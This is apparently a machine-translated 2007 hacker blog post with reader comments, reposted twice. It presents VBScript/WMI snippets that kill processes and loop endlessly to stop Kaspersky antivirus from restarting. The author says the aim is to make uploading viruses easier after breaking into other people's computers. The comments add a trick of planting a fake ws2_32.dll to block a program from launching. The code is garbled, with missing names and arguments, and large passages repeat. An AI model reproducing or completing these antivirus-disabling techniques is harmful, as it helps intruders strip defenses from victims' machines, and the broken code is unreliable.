I had no classes this afternoon, so I hid in my private space and started thinking about some questions. When browsing VBS-related cases, I wrote two mini programs myself, which are Hack-like (in fact, as long as I can "borrow a knife to kill people", what software is not hacking? - -!). Used to end the process in cmd, and to prevent a process from starting again in window mode. Neither of these two VBS will be KILLed by the antivirus software, and it has a certain degree of concealment... look at the code! ('For comments)
:
for each ps in getobject _
("winmgmts:\\.\root\cimv2:win32_process").instances_ 'I can't explain clearly when it comes to WMI script intrusion technology!
if =(0) then 'Just determine whether the PID number of the process is equal to the obtained PID number parameter.
'If it is equal, end the process corresponding to the specified PID number.
end if
next
dim y,x 'It's okay if you don't have this...
do 'I've made a vicious cycle... I've been judging! do ...The loop is the loop body!
set y=getobject("winmgmts:\\.\root\cimv2") 'Same as the above explanation, this also involves Microsoft's WMI technology!
set x=("select * from win32_process where name=''")
'Query statement, where, determine whether (Kaba) exists in the process!
'In this way, when Kaba is over the top, it will never be activated again. Unless, the end is over first...
for each i in x
() 'Kaba will be terminated immediately if it is to be started...
next
loop
The explanation is clear enough, let's take a look at how these two vbs work. I will put it in the root directory of the C disk.
Open cmd, enter cd\ back to the root directory of the C disk, enter tasklist to view the current system process status, and then record the PID number of the process you want to kill, enter cscript 2200 to end the process with PID 2200! If this process is, you can enter startup to prevent Kaba from continuing to be started. When starting, there are only process items in the task manager process. If this process is not finished, Kaba cannot be started again.
Understanding these will make it a little more convenient for uploading viruses, *s, etc. after invading other people's computers... All the above processes have been successfully tested by myself and continue to be improved...
ws2_32.dll
Create this in the program directory and organize the program to run.
Greysign - 2007-03-20 19:01 Block.
ycosxhack - 2007-03-20 19:15
I was dizzy, sure enough! Create a notepad and rename it to ws2_32.dll, just... OK, write it down! hehe……
Greysign - 2007-03-20 21:21
Running the program will look for this interface file in the WINDOWS directory. However, it will search in the program directory first.
ycosxhack - 2007-03-20 21:43
Interface file? What you mean: Any program has to look for it? Call this library file? Deleting it will be really troublesome...
Greysign - 2007-03-20 22:37 Yes.
Turn:/ycosxhack/blog/item/
:
Copy the codeThe code is as follows:
for each ps in getobject _
("winmgmts:\\.\root\cimv2:win32_process").instances_ 'I can't explain clearly when it comes to WMI script intrusion technology!
if =(0) then 'Just determine whether the PID number of the process is equal to the obtained PID number parameter.
'If it is equal, end the process corresponding to the specified PID number.
end if
next
Copy the codeThe code is as follows:
dim y,x 'It's okay if you don't have this...
do 'I've made a vicious cycle... I've been judging! do ...The loop is the loop body!
set y=getobject("winmgmts:\\.\root\cimv2") 'Same as the above explanation, this also involves Microsoft's WMI technology!
set x=("select * from win32_process where name=''")
'Query statement, where, determine whether (Kaba) exists in the process!
'In this way, when Kaba is over the top, it will never be activated again. Unless, the end is over first...
for each i in x
() 'Kaba will be terminated immediately if it is to be started...
next
loop
Open cmd, enter cd\ back to the root directory of the C disk, enter tasklist to view the current system process status, and then record the PID number of the process you want to kill, enter cscript 2200 to end the process with PID 2200! If this process is, you can enter startup to prevent Kaba from continuing to be started. When starting, there are only process items in the task manager process. If this process is not finished, Kaba cannot be started again.
Understanding these will make it a little more convenient for uploading viruses, *s, etc. after invading other people's computers... All the above processes have been successfully tested by myself and continue to be improved...
Copy the codeThe code is as follows:
ws2_32.dll
Create this in the program directory and organize the program to run.
Greysign - 2007-03-20 19:01 Block.
ycosxhack - 2007-03-20 19:15
I was dizzy, sure enough! Create a notepad and rename it to ws2_32.dll, just... OK, write it down! hehe……
Greysign - 2007-03-20 21:21
Running the program will look for this interface file in the WINDOWS directory. However, it will search in the program directory first.
ycosxhack - 2007-03-20 21:43
Interface file? What you mean: Any program has to look for it? Call this library file? Deleting it will be really troublesome...
Greysign - 2007-03-20 22:37 Yes.
Turn:/ycosxhack/blog/item/